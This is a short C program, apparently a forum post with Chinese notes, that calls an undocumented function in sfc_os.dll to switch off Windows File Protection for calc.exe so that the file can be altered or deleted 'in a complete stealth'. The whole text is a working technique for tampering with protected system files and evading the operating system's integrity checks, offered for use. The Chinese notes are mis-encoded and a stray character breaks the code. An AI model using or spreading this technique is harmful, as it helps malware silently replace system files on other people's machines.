#include <stdio.h>
#include <windows.h>
typedef DWORD(__stdcall *CPP) (DWORD param1, PWCHAR param2, DWORD param3);
void Disable_WFP()
{
HINSTANCE hmod=LoadLibrary("sfc_os.dll");
CPP SetSfcFileException;
// the function is stored at the fifth ordinal in sfc_os.dll
SetSfcFileException= (CPP)GetProcAddress(hmod,(LPCSTR)5);
SetSfcFileException(0, L"c:\\windows\\system32\\calc.exe",-1);
//Now we can modify the system file in a complete stealth.
}
void main()
{
?Disable_WFP();
}
運(yùn)行后,刪除 C:\WINDOWS\SYSTEM32\CALC.EXE文件,不會(huì)自動(dòng)恢復(fù)
Windows2K3 CN SP1 VC6 測(cè)試通過
好像說重啟后會(huì)恢復(fù),這個(gè)未測(cè)試,所以叫暫停